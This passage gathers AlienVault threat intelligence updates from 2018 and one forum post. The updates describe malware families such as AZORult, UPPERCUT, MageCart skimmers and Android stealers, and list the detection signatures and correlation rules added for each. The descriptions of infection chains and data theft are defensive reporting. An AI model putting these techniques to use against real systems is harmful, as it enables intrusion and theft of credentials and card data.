    The main locations targeted by this malware include the Middle East (Iraq, Iran and Arabia Saudi), East Asia (Vietnam and China), and Argentina.

    We've added NIDS signatures and updated the following correlation rule as a result of Mylobot activity:
    • System Compromise, Malware Infection, Trojan
    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5bec53edbc977065131869ff

    New Detection Techniques - GhostDNS JS DNSChanger

    GhostDNS is a botnet infection spread through infected webpages. It is thought that this botnet has infected around 100,000 home router devices so far. It is unknown how long it has been active so far, but researchers estimate that initial campaigns are one year old.

    The main module of GhostDNS is called DNSChanger. Its activity makes it similar to the malware with the same name. It tries to change the DNS server settings on the infected device, allowing an attacker to route the user traffic. DNSChanger includes three different modules, one of them written in JavaScript. It contains 10 different attack scripts designed to infect a total of 6 different router models. Once the DNS table is corrupted, user traffic is routed to phishing websites where they might enter sensitive data such as credit card numerations.

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity:
    • System Compromise, Exploit Kit, EK Payload Delivered
    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5bb33e3b1106f56a6ce44632

    New Detection Techniques - Urpage Stealer

    Urpage is the name of an unidentified threat actor which may have some connections to Confucious, Patchwork, and Bahamut actors, according to TrendMicro security researchers. Samples share some links, domain names, and file hashes found in the CnC server.

    Urpage targets Android devices. The behaviour is similar to the Confucious and Patchwork stealers. It will try to install several Android applications, including one that looks like a fake Threema, an end-to-end encrypted messaging application. After installation, it starts to gather data, such as SMS, contact lists, audio records, GPS location, system files, and MAC address. It also may install a backdoor module: a customized version of AndroRAT. The CnC traffic is base64 encoded.

    Surprisingly, the same infected web pages serving the Urpage payload for Android devices were found delivering samples of Windows malware.

    We've added NIDS signatures and updated the following correlation rule as a result of Urpage Stealer activity:
    • System Compromise, Malware Infection, Trojan
    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5b86c1af84048207fdac6338

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including JunkMiner Downloader, Operation Baby, Urpage Stealer, Win32.Metamorfo.Banker, Win32/Snowman, and Zyro FTP Stealer activity:
    • System Compromise, Malware Infection, Trojan

    New Detection Techniques - Botnet Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent botnet infection activity, including Mylobot, PhanapikalBot, and TeleGbot:
    • System Compromise, Malware Infection, Trojan

    New Detection Techniques - C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:
    • System Compromise, Malware Infection, Suspicious SSL Certificate

    New Detection Techniques

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity:
    • System Compromise, Exploit Kit, EK Payload Delivered
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Remote Access Trojan
    • Exploitation & Installation, Exploit, Code Execution

    Updated Detection Techniques - Trojan Infection

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including FIN7 Griffon, JS/BrushaLoader CnC, Kryptik, Obfuscated PowerShell Inbound, TinyNuke:
    • System Compromise, Malware, Trojan

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:
    • System Compromise, Malware Infection, Suspicious SSL Certificate

    Updated Detection Techniques

    We've updated our NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including phishing activity, Mocker, ELF/Muhstik, PhanapikaBot, CoinMiner, Android Rootnik-Al, Kraken Ransomware, and APT32:
    • Delivery & Attack, Malware Infection, Phishing
    • Exploitation & Installation, Exploit, Code Execution
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Ransomware
  • AlienVault Labs Threat Intelligence Update for USM Appliance: October 28 – November 3, 2018

    New Detection Techniques – Caesar

    Caesar is an HTTP-based Remote Access Trojan that allows the attacker to remotely control the victim's device directly from a browser, granting access from any type of device, even cell phones. The RAT is mainly intended for web servers. Additionally, due to being database driven, the attacker can queue tasks to be performed whenever the victim is online and check the results.

    We've added NIDS signatures and the following correlation rule to detect Caesar activity:
    • System Compromise, Malware RAT, py.caesarRAT

    New Detection Techniques – AZORult

    AZORult is a trojan malware used first to steal financial information from the victim's computer, and then to install ransomware on the system. The trojan has been seen used in malware campaigns targeting computers globally, usually propagating through phishing emails with an attached downloader. Once the downloader is executed, the malware downloads and executes two payloads. The first payload provides AZORult's primary functionality, which is stealing information from local accounts, browsers, saved credentials, etc. The second payload delivers ransomware, improving the attack's efficacy by changing malware family.

    We've added NIDS signatures and the following correlation rules to detect AZORult activity:
    • System Compromise, Trojan infection, AZORult SSL Activity

    New Detection Techniques – Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Trojan infection, EvilVNC Backdoor
    • System Compromise, Trojan infection, MSIL.WebBotnet.A
    • System Compromise, Trojan infection, MSIL/Agent.SWS
    • System Compromise, Trojan infection, MSIL/KeyRedirEx CnC Activity
    • System Compromise, Trojan infection, MSIL/KeyRedirEx CnC Response
    • System Compromise, Trojan infection, MSIL/Owned Bot
    • System Compromise, Trojan infection, MSIL/SCBP.Stealer
    • System Compromise, Trojan infection, MSIL/TPA02
    • System Compromise, Trojan infection, MSIL/Ubiquity Stealer
    • System Compromise, Trojan infection, Obfuscated PowerShell Inbound
    • System Compromise, Trojan infection, Qbot SSL Activity
    • System Compromise, Trojan infection, SuckLoader
    • System Compromise, Trojan infection, TrueBot/Silence.Downloader
    • System Compromise, Trojan infection, VBS/Agent.Y
    • System Compromise, Trojan infection, W32.YBomeMiner
    • System Compromise, Trojan infection, Win32/Agent.QP

    New Detection Techniques – Remote Access Tools

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Malware RAT, RizzoRAT SSL Activity
    • System Compromise, Malware RAT, njRAT SSL Activity

    New Detection Techniques – Mobile Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Mobile trojan infection, Android/GPlayed
    • System Compromise, Mobile trojan infection, Android/GoldenTouch.A!tr
    • System Compromise, Mobile trojan infection, Trojan-Spy.AndroidOS.SmForw.ar

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, D-Link DIR-816 A2 RCE
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, DuomiCMS RCE (CVE-2018-18083)
    • System Compromise, Ransomware infection, Trojan-Ransom.AndroidOS.Congur.y

    Updated Detection Techniques – Trojan Infection

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Trojan infection, AZORult
    • System Compromise, Trojan infection, Banload Downloader
    • System Compromise, Trojan infection, FlyStudio
    • System Compromise, Trojan infection, MSIL/IRCBot
    • System Compromise, Trojan infection, MSIL/KeyRedirEx CnC Response
    • System Compromise, Trojan infection, MalDoc
    • System Compromise, Trojan infection, TScookie
    • System Compromise, Trojan infection, Unknown PowerShell
    • System Compromise, Trojan infection, Zebrocy

    Updated Detection Techniques – Remote Access Tools

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Malware RAT, Remcos/Remvio

    Updated Detection Techniques – Mobile Trojan Infection

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Mobile trojan infection, Android/TrojanDropper.Agent.BL

    Updated Detection Techniques – C&C Communication

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:
    • System Compromise, C&C Communication, Gootkit SSL activity
    • System Compromise, C&C Communication, MalDoc
    • System Compromise, C&C Communication, Malicious SSL Cert (CobInt Downloader)
    • System Compromise, C&C Communication, Malicious SSL Cert (sLoad)
    • System Compromise, C&C Communication, Ursnif SSL activity

    Updated Detection Techniques

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    Delivery & Attack, Malicious website, Phishing activity
    • System Compromise, Malicious website - Exploit Kit, GreenFlash Sundown EK
    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Malware infection, Ursnif
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: October 28 – November 3, 2018

    New Detection Techniques – Caesar

    Caesar is an HTTP-based Remote Access Trojan that allows the attacker to remotely control the victim's device directly from a browser, granting access from any type of device, even cell phones. The RAT is mainly intended for web servers. Additionally, due to being database driven, the attacker can queue tasks to be performed whenever the victim is online and check the results.

    We've added NIDS signatures and updated the following correlation rule to detect Caesar activity:
    • System Compromise, Malware, Remote Access Trojan

    New Detection Techniques – AZORult

    AZORult is a trojan malware used first to steal financial information from the victim's computer, and then to install ransomware on the system. The trojan has been seen used in malware campaigns targeting computers globally, usually propagating through phishing emails with an attached downloader. Once the downloader is executed, the malware downloads and executes two payloads. The first payload provides AZORult's primary functionality, which is stealing information from local accounts, browsers, saved credentials, etc. The second payload delivers ransomware, improving the attack's efficacy by changing malware family.

    We've added NIDS signatures and updated the following correlation rule to detect AZORult activity:
    • System Compromise, Malware, Suspicious SSL Certificate

    New Detection Techniques – Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including EvilVNC Backdoor, MSIL.WebBotnet.A, MSIL/Agent.SWS, MSIL/KeyRedirEx CnC Activity, MSIL/KeyRedirEx CnC Response, MSIL/Owned Bot, MSIL/SCBP.Stealer, MSIL/TPA02, MSIL/Ubiquity Stealer, Obfuscated PowerShell Inbound, Qbot SSL Activity, SuckLoader, TrueBot/Silence.Downloader, VBS/Agent.Y, W32.YBomeMiner, and Win32/Agent.QP:
    • System Compromise, Malware, Trojan

    New Detection Techniques – Remote Access Tools

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including RizzoRAT SSL Activity and njRAT SSL Activity:
    • System Compromise, Malware Infection, Remote Access Trojan
    • System Compromise, Malware, Suspicious SSL Certificate

    New Detection Techniques – Mobile Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including GPlayed, GoldenTouch.A!tr, and Trojan-Spy.AndroidOS.SmForw.ar:
    • System Compromise, Malware, Trojan
    • System Compromise, Malware, Spyware

    New Detection Techniques

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity:
    • Exploitation & Installation, Exploit, Code Execution
    • System Compromise, Malware, Trojan

    Updated Detection Techniques – Trojan Infection

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including AZORult, Banload Downloader, FlyStudio, MSIL/IRCBot, MSIL/KeyRedirEx CnC Response, MalDoc, TScookie, Zebrocy, and additional PowerShell activity: 
    • System Compromise, Malware, Trojan

    Updated Detection Techniques – Remote Access Tools

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Remcos/Remvio:
    • System Compromise, Malware Infection, Remote Access Trojan

    Updated Detection Techniques – Mobile Trojan Infection

    We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Android/TrojanDropper.Agent.BL:
    • System Compromise, Malware, Trojan

    Updated Detection Techniques – C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:
    • System Compromise, Malware, Suspicious SSL Certificate

    Updated Detection Techniques

    • We've updated NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including GreenFlash Sundown exploit kit, CoinMiner, Ursnif, and phishing activity:
    • Delivery & Attack, Suspicious Activity, Phishing
    • Exploitation & Installation, Exploit, Code Execution
    • System Compromise, Malware, Trojan
  • Ransomware directives
    kcoe's answer is non-responsive to the question. The OP asked about a method of identifying an active ransomware event that has evaded the AV and it is still relevant and some guidance from AlienWare would be appreciated. 
    My org experienced a zero-day ransomware event where none of the VIrusTotal detectors had seen the attack prior to us - how do I minimize the damage if my SIEM can't let me know about abnormal file modifications?
    Can someone PLEASE provide some guidance on this?
  • AlienVault Labs Threat Intelligence Update for USM Appliance: October 14 – October 20, 2018

    New Detection Techniques - Xor.DDoS

    Xor.DDoS is a DDoS bot targeting the Linux OS platform which has been active since 2015. The name Xor.DDoS stems from the heavy usage of XOR encryption in both malware and network communication to the C&Cs. The Xor.DDoS bot differentiates itself from other DDoS bots by using a custom LKM module for rootkit functionality. The rootkit component in Xor.DDoS is said to be based on the open-source Suterusu rootkit and its main purpose is to hide network communications.

    We've added NIDS signatures and the following correlation rule to detect Xor.DDoS: 

    • System Compromise, Trojan infection, ELF/Chacha.DDoS/Xor.DDoS

    New Detection Techniques - Hidden Mellifera/Hidden Bee

    Hidden Bee is a complex Coinmining bootkit that is known to be distributed by the Underminer Exploit Kit, amongst others. The Hidden Bee mining component is distributed in a custom executable format rather than in a regular PE file, which gets dropped after multiple stages. For network communications, Hidden Bee uses both HTTP and encrypted TCP.

    As for persistence, Hidden Bee alters the MBR record so the miner is started every time the operating system boots:

    • We've added NIDS signatures and the following correlation rule to detect Hidden Bee: 
    • System Compromise, Trojan infection, Hidden Mellifera Bee

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Mobile trojan infection, Trojan-Clicker.AndroidOS.Ubsod.b
    • System Compromise, Mobile trojan infection, Android.Trojan.SpyCall
    • System Compromise, Mobile trojan infection, Trojan.AndroidOS.Banker.GPlayed

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, json Client Exfil
    • System Compromise, Trojan infection, XLS.Unk DDE
    • System Compromise, Trojan infection, XLS.Unk DDE

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, CMCMS WebShell (CVE-2018-17126)
    • System Compromise, Backdoor, DeadlyEagle
    • System Compromise, C&C Communication, Gadwats

    Updated Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, Gootkit
    • System Compromise, Trojan infection, MSIL/CoalaBot
    • System Compromise, Trojan infection, QwertMiner
    • System Compromise, Trojan infection, MalDoc
    • System Compromise, Trojan infection, Fuerboos
    • System Compromise, Malware RAT, NavRAT
    • System Compromise, Trojan infection, XLS.Unk DDE
    • System Compromise, Trojan infection, Unknown trojan
    • System Compromise, Malware RAT, DarkComet
    • System Compromise, Trojan infection, Linux DDoS Bot
    • System Compromise, Malware RAT, Remcos/Remvio

    Updated Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Mobile trojan infection, Android APT-C-23
    • System Compromise, Mobile trojan infection, Asacub.a Banker

    Updated Detection Technique – C&C Communication

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:

    • System Compromise, C&C Communication, Known malicious SSL certificate
    • System Compromise, C&C Communication, Ursnif SSL activity
    • System Compromise, C&C Communication, Observed Malicious SSL Cert (MalDoc DL) SSL activity
    • System Compromise, C&C Communication, Zeus Panda SSL Certificate
    • System Compromise, C&C Communication, Cobalt Group
    • System Compromise, C&C Communication, Cobalt Group SSL
    • System Compromise, C&C Communication, MalDoc

    Updated Correlation Rules

    We've added NIDS signatures and updated the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Ransomware infection, Locky
    • System Compromise, Ransomware infection, GoldenEye
    • System Compromise, Backdoor, DeadlyEagle
    • Delivery & Attack, Malicious website - Exploit Kit, Malicious redirection
    • Delivery & Attack, Malicious website, Phishing activity
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: October 14 – October 20, 2018

    New Detection Techniques - Xor.DDoS

    Xor.DDoS is a DDoS bot targeting the Linux OS platform which has been active since 2015. The name Xor.DDoS stems from the heavy usage of XOR encryption in both malware and network communication to the C&Cs. The Xor.DDoS bot differentiates itself from other DDoS bots by using a custom LKM module for rootkit functionality. The rootkit component in Xor.DDoS is said to be based on the open-source Suterusu rootkit and its main purpose is to hide network communications.

    We've added NIDS signatures and the following correlation rule to detect Xor.DDoS:

    • System Compromise, Malware, Trojan

    New Detection Techniques - Hidden Mellifera/Hidden Bee

    Hidden Bee is a complex Coinmining bootkit that is known to be distributed by the Underminer Exploit Kit, amongst others. The Hidden Bee mining component is distributed in a custom executable format rather than in a regular PE file, which gets dropped after multiple stages. For network communications, Hidden Bee uses both HTTP and encrypted TCP.

    As for persistence, Hidden Bee alters the MBR record so the miner is started every time the operating system boots.

    We've added NIDS signatures and the following correlation rule to detect Hidden Bee:

    • System Compromise, Malware, Trojan

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Trojan.AndroidOS.Banker.GPlayed and Trojan-Clicker.AndroidOS.Ubsod.b:

    • System Compromise, Malware, Trojan

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including Xor.DDoS and Hidden Mellifera Bee:

    • System Compromise, Malware, Trojan

    New Detection Techniques

    We've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including DeadlyEagle and Gadwats:

    • Delivery & Attack, Exploit, Webshell
    • System Compromise, Malware Infection, Trojan

    Updated Detection Techniques - Trojan Infection

    We've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including Remcos/Remvio, Gootkit, MSIL/CoalaBot, Fuerboos, NavRAT, and DarkComet:

    • System Compromise, Malware Infection, Remote Access Trojan
    • System Compromise, Malware Infection, Trojan

    Updated Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including Android APT-C-23 and Asacub.a Banker:

    • System Compromise, Malware Infection, APT
    • System Compromise, Malware, Trojan

    Updated Detection Technique – C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:

    • System Compromise, Malware, Suspicious SSL Certificate

    Updated Correlation Rules

    We've added NIDS signatures and the following correlation rules to additional recent malicious activity, including CoinMiner, Locky, GoldenEye, DeadlyEagle, and various phishing activity:

    • System Compromise, Malware Infection, Ransomware
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Backdoor
    • Delivery & Attack, Malware, Exploit Kit - Redirection
    • Delivery & Attack, Suspicious Activity, Phishing

  • AlienVault Labs Threat Intelligence Update for USM Anywhere: September 23 – September 29, 2018

    New Detection Techniques - VBscript UAF (CVE-2018-8373)

    The Remote Code Execution vulnerability CVE-2018-8373 leverages the way the scripting engine handles objects in memory in Visual Basic Scripts (VBScript). In particular, once a VBScript is using Shell.Application or wscript.Shell to execute scripts, the engine decides whether the script should run by checking for the SafeMode flag. If this flag is not in safe mode, the shellcode will execute. However, if the Internet Explorer version is the latest (even without patching), the script will not run since the SafeMode flag is located in a different location. 

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect the VBScript UAF Exploit:

    • Exploitation & Installation, Exploit, Code Execution

    Related content in Open Threat Exchange: https://otx.alienvault.com/indicator/cve/CVE-2018-8373

    New Detection Techniques - Mobile Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including Android/Ceshi.Stealer and Android/FakeDefender.

    • System Compromise, Malware, Trojan

    New Detection Techniques - Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including MSIL.Xpctra RAT, MSIL/AcouKitty Stealer, MS_D0wnl0ad3r, VBS/Frauder, Viro, and WebSearchy Browser Hijack:

    • System Compromise, Malware Infection, Remote Access Trojan
    • System Compromise, Malware Infection, Trojan

    New Detection Techniques

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including MalDoc, N40, and JS/Soakinj:

    • System Compromise, Malware, Trojan
    • System Compromise, Malware, Ransomware
    • System Compromise, Malware, Suspicious SSL Certificate
    • Exploitation & Installation, Exploit, Vulnerability Scanner
    • Exploitation & Installation, Exploit, Code Execution

    Updated Detection Techniques - Android APT-C-23

    This has been the third consecutive week with heavy activity by the Android APT-C-23 group, mainly targeting victims in the Middle East. The main reason is the large number of domains registered by the group (hundreds) that are still being discovered and attributed to them. The main infection vector was to distribute fake updates to legitimate Android applications, either by sending phishing SMS or uploading the malware to third party stores (even Google Play at first). Through the use of Firebase Cloud Messaging (FCM) or SMS, the attackers could communicate with the C&C and send instructions to the malware. On top of the C&C communication, the malware was capable of many diverse malicious activities such as: uploading or encrypting files, file management, recording and install/uninstall other apps.

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity:

    • System Compromise, Malware, APT

    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5ba136c3555f0f6a740209ae

    Updated Detection Techniques - Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including Quasar, Remcos, CoinMiner, Ursnif, KPOT, MalDoc, DanaBot and ZeroEvil:

    • System Compromise, Malware, Trojan
    • System Compromise, Malware, Remote Access Trojan

    Updated Detection Techniques - Mobile Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including Asacub.a Banker and Trojan.AndroidOS.Handda.

    • System Compromise, Malware, Trojan

    Updated Detection Technique – C&C Communication

    For USM Anywhere, we've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:

    • System Compromise, Malware, Suspicious SSL Certificate

    Updated Correlation Rules

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to additional recent malicious activity, including phishing activity, bruteforce activity, and an exploit through VBScript:

    • Exploitation & Installation, Exploit, Code Execution
    • Delivery & Attack, Suspicious Activity, Phishing
    • Delivery & Attack, Attack, Bruteforce
  • AlienVault Labs Threat Intelligence Update for USM Appliance: September 16 – September 22, 2018

    New Detection Techniques - UPPERCUT backdoor

    The UPPERCUT backdoor, also called ANEL, is a backdoor used by the group APT10 in a recent campaign targeting the Japanese media sector. The backdoor is distributed via Macro-enabled Word documents with a traditional lure. The malicious document drops 3 files which then get decoded by certutil.exe. The dropped files are:

    1. GUP.exe: GUP, legitimate generic updater from GNU
    2. libcurl.dll: Malicious Loader DLL
    3. 3F2E3AB9: Encrypted shellcode

    The malicious document then executes the dropped GUP.exe, which loads the malicious libcurl.dll instead of the legitimate one (via DLL search order hijacking). Once loaded, the malicious DLL will load, decrypt, and execute the encrypted shellcode contained in the third file. The encrypted shellcode will then decompress and execute another embedded DLL. This latter DLL is the final stage payload.

    Once operational, UPPERCUT contacts a hard-coded Command & Control domain. Said communications are Blowfish-encrypted using one of the multiple hard-coded Blowfish encryption keys.

    For USM Appliance, we've added NIDS signatures and the following correlation rule to detect CVE-2018-8459 exploits: 

    • Exploitation & Installation, WebServer Attack, Microsoft Edge Type Confusion Attempt (CVE-2018-8459)

    New Detection Techniques - MageCart

    MageCart is a card-skimming threat actor which focus on stealing creadit card details with malicious JavaScript code. Recently, MageCart has been found to have compromised Inbenta, which supplies content for e-commerce websites such as Ticketmaster. As a result, a malicious JavaScript piece was inserted into Ticketmaster's website. The injected JavaScript code is fairly simple as it only checks if the browser is in a "checkout" page with a regular expression and, if so, hooks every form send or button click. When the hook is executed the code gathers all the text inputs data and sends them to a server controlled by MageCart.

    It appears, however, that Inbenta was not the only compromised organization, but rather the tip of the iceberg. SociaPlus, PushAssist, and Clarity Connect were also found to be compromised, according to RiskIQ.

    For USM Appliance, we've added NIDS signatures and the following correlation rule to detect MageCart activity: 

    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, MageCart

    New Detection Techniques - Backdoors

    For USM Appliance, we've added the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Backdoor, UPPERCUT
    • System Compromise, Backdoor, WebShell by GHZ

    New Detection Techniques - Mobile Trojan Infection

    For USM Appliance, we've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Mobile trojan infection, Trojan-Downloader.AndroidOS.Agent.fj
    • System Compromise, Mobile trojan infection, Android/Triada.IHM
    • System Compromise, Mobile trojan infection, Android APT-C-23
    • System Compromise, Mobile trojan infection, Trojan-Dropper.AndroidOS.Wapnor.a
    • System Compromise, Mobile trojan infection, Trojan-Dropper.AndroidOS.Agent.hf

    New Detection Techniques - Trojan Infection

    For USM Appliance, we've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, Win32/Agent.ZJL
    • System Compromise, Trojan infection, Win32/Agent.XXYIUO
    • System Compromise, Trojan infection, W32.Bloat-A
    • System Compromise, Trojan infection, Win32.Unwaders.C
    • System Compromise, Trojan infection, Win32/ZeroEvil
    • System Compromise, Trojan infection, RektBot
    • System Compromise, Trojan infection, MSIL/Acrux Miner Stealer
    • System Compromise, Trojan infection, Win32/PSW.Agent.OFE
    • System Compromise, Trojan infection, Win32/PlugF
    • System Compromise, Trojan infection, Win32/ShamSalt
    • System Compromise, Trojan infection, Win32.ActiveAgent

    New Detection Techniques

    For USM Appliance, we've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, C&C Communication, MageCart Exfil
    • System Compromise, C&C Communication, Agent Tesla
    • System Compromise, Ransomware infection, STOP Ransomware
    • System Compromise, C&C Communication, JadidBot CnC
    • System Compromise, Botnet infection, Fbot/Satori
    • System Compromise, Worm infection, Xbash
    • Exploitation & Installation, Service Exploit, NUUO NVR Peekaboo Vulnerability Check Inbound
    • Exploitation & Installation, Service Exploit, NUUO NVRMini2 3.8 RCE Inbound
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Apache Pluto RCE (CVE-2018-1306)

    Updated Detection Techniques - Trojan Infection

    For USM Appliance, we've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, MalDoc
    • System Compromise, Trojan infection, W32/Kutaki
    • System Compromise, Trojan infection, Win32.DanaBot
    • System Compromise, Trojan infection, Zebrocy
    • System Compromise, Trojan infection, MinerLoader
    • System Compromise, Trojan infection, Win32/ZeroEvil

    Updated Detection Techniques - Mobile Trojan Infection

    For USM Appliance, we've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Mobile trojan infection, Asacub.a Banker
    • System Compromise, Mobile trojan infection, Android.SmsPay
    • System Compromise, Mobile trojan infection, TrojanDropper.Shedun
    • System Compromise, Mobile trojan infection, Android APT-C-23

    Updated Detection Technique – C&C Communication

    For USM Appliance, we've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:

    • System Compromise, C&C Communication, Revcode SSL activity
    • System Compromise, C&C Communication, Observed Malicious SSL Cert (MalDoc DL) SSL activity
    • System Compromise, C&C Communication, Known malicious SSL certificate
    • System Compromise, C&C Communication, MageCart Exfil

    Updated Correlation Rules

    For USM Appliance, we've added NIDS signatures and updated the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Worm infection, Ramnit
    • System Compromise, Worm infection, Phorpiex
    • System Compromise, Suspicious Behaviour, Suspicious user-agent detected
    • System Compromise, Malware infection, Tofsee
    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Malicious website - Exploit Kit, Fallout EK
    • Delivery & Attack, Malicious website, Phishing activity
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: September 16 – September 22, 2018

    New Detection Techniques - UPPERCUT backdoor

    The UPPERCUT backdoor, also called ANEL, is a backdoor used by the group APT10 in a recent campaign targeting the Japanese media sector. The backdoor is distributed via Macro-enabled Word documents with a traditional lure. The malicious document drops 3 files which then get decoded by certutil.exe. The dropped files are:

    1. GUP.exe: GUP, legitimate generic updater from GNU
    2. libcurl.dll: Malicious Loader DLL
    3. 3F2E3AB9: Encrypted shellcode

    The malicious document then executes the dropped GUP.exe, which loads the malicious libcurl.dll instead of the legitimate one (via DLL search order hijacking). Once loaded, the malicious DLL will load, decrypt, and execute the encrypted shellcode contained in the third file. The encrypted shellcode will then decompress and execute another embedded DLL. This latter DLL is the final stage payload.

    Once operational, UPPERCUT contacts a hard-coded Command & Control domain. Said communications are Blowfish-encrypted using one of the multiple hard-coded Blowfish encryption keys.

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect CVE-2018-8459 exploits:

    • Delivery & Attack, Vulnerable Software Exploitation, Code Execution

    New Detection Techniques - MageCart

    MageCart is a card-skimming threat actor which focus on stealing creadit card details with malicious JavaScript code. Recently, MageCart has been found to have compromised Inbenta, which supplies content for e-commerce websites such as Ticketmaster. As a result, a malicious JavaScript piece was inserted into Ticketmaster's website. The injected JavaScript code is fairly simple as it only checks if the browser is in a "checkout" page with a regular expression and, if so, hooks every form send or button click. When the hook is executed the code gathers all the text inputs data and sends them to a server controlled by MageCart.

    It appears, however, that Inbenta was not the only compromised organization, but rather the tip of the iceberg. SociaPlus, PushAssist, and Clarity Connect were also found to be compromised, according to RiskIQ.

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect MageCart activity:

    • Delivery & Attack, Vulnerable Software Exploitation, Code Execution

    New Detection Techniques - Backdoors

    For USM Anywhere, we've updated the following correlation rule as a result of additional recent malicious activity, including UPPERCUT and WebShell by GHZ:

    • System Compromise, Malware, Backdoor

    New Detection Techniques - Mobile Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including Trojan-Downloader.AndroidOS.Agent.fj, Android/Triada.IHM, Android APT-C-23, Trojan-Dropper.AndroidOS.Wapnor.a, and Trojan-Dropper.AndroidOS.Agent.hf.

    • System Compromise, Malware, Trojan
    • System Compromise, Malware, Dropper
    • System Compromise, Malware, Downloader

    New Detection Techniques - Trojan Infection

